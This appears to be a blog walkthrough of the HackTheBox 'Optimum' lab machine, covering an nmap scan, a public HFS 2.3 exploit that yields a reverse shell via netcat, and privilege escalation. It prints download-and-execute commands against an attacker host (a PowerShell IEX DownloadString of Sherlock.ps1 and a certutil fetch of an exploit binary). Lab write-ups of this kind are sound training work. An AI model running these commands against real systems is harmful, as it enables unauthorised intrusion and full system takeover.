Buy me a tea

Hackthebox - Optimum

  • Windows

Optimum

Nmap

┌──(kali㉿kali)-[~]
└─$ sudo nmap -T4 -sC -sV -O -Pn -p- 10.10.10.8
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-10 19:50 EDT
Nmap scan report for 10.10.10.8
Host is up (0.022s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-title: HFS /
|_http-server-header: HFS 2.3
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows 7 Professional (87%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 113.56 seconds

Port 80

  • We have an HttpFile Server httpFileServer

  • If we google it we find this exploit right away

  • We have to get nc.exe in our attacking machine. Kali has binaries hosted so we can just copy and paste it in our working dir like this cp /usr/share/windows-resources/binaries/nc.exe .

  • We have to serve netcat using python http server python3 -m http.server 80

  • Then we have to modify the script and add our ip address and our port (I left 443)

  • We set a listener rlwrap nc -lvp 443

  • We launch our exploit python2 39161 10.10.10.8 80

  • And we get a shell shell

  • We can grab the user flag user flag

Privesc

  • Win version

win version

Kernel exploits

  • echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.3/Sherlock.ps1') | powershell -noprofile -

Local privesc

  • Let's find another exploit than the one mentioned in Sherlock (does not work) searchsploit ms16-032

searchsploit

  • Tried a few exploits but none worked

  • On google I found this

  • And in the comment they mention this exe file

  • We download it in our kali

  • Serve it with python

  • certutil.exe -urlcache -f http://10.10.14.3/41020.exe exploit.exe get it in our target

  • We launch it we get a system shell

system

  • We can grab the root flag

root
PreviousHackthebox - NibblesNextHackthebox - Paper

Last updated